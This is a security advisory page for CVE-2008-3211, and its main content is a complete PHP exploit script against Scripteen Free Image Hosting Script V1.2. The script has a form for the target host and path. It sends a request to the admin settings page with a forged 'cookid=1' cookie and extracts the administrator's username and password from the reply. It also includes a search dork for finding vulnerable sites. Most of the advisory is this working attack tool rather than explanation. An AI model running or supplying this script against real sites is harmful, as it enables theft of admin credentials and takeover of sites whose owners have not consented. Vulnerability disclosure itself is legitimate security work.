|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4014 CVE : CVE-2008-3211 CWE : CWE-DesignError SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : RMx - Liz0zim Published : 20.07.2008
Advisory Content : <?php /* Coded By RMx - Liz0zim BiyoSecurity.Com & Coderx.org Ki zava Ki Zava :) Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz */ error_reporting("E_ALL"); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $desen='|value="(.*)"|siU'; function yolla($host,$paket) { global $veri; $ac=fsockopen(gethostbyname($host),80); if (!$ac) { echo 'Unable to connect to server '.$host.':80'; exit;//Ba�lanamaz ise } fputs($ac,$paket); $veri=""; while (!feof($ac)) { $veri.=fread($ac,1); } fclose($ac); } ?> <h2>Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit</h2> <p>Coded By RMx - Liz0ziM</p> <p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p> <p>Dork:"Powered by Scripteen Free Image Hosting Script V1.2"</p> <form method="POST" action=""> <p>TARGET HOST: <input name="host" type="text" /> Example:<strong>www.xxxx.com</strong></p> <p>TARGET PATH: <input name="klasor" type="text" /> Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p> <p><input name="yolla" type="submit" value="Send" /></p> </form><br /> <? if($_POST[yolla]){ $host=$_POST[host]; $klasor=$_POST[klasor]; $admin=$_POST[admin]; $p=$klasor."admin/settings.php"; echo '<font color="red"><b>Sending Exploit..</b></font><br>'; $packet ="GET ".$p." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cookid=1\r\n"; $packet.="Connection: Close\r\n\r\n"; yolla($host,$packet); preg_match_all($desen,$veri,$cik); $ad=$cik[1][0]; $sifre=$cik[1][1]; if($ad AND $sifre){ echo ' <font color="green">Exploit succeeded...</font ><br> Admin Username:<b>'.$ad.'</b><br> Admin Password:<b>'.$sifre.'</b><br>'; } else { echo '<font color="red">Exploit Failed !</font>'; } } ?> References : http://securityreason.com/expldownload/1/4326/1 (Exploit) http://xforce.iss.net/xforce/xfdb/43771
http://www.securityfocus.com/bid/30217
http://www.milw0rm.com/exploits/6070
http://www.frsirt.com/english/advisories/2008/2106/references
http://secunia.com/advisories/31083  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |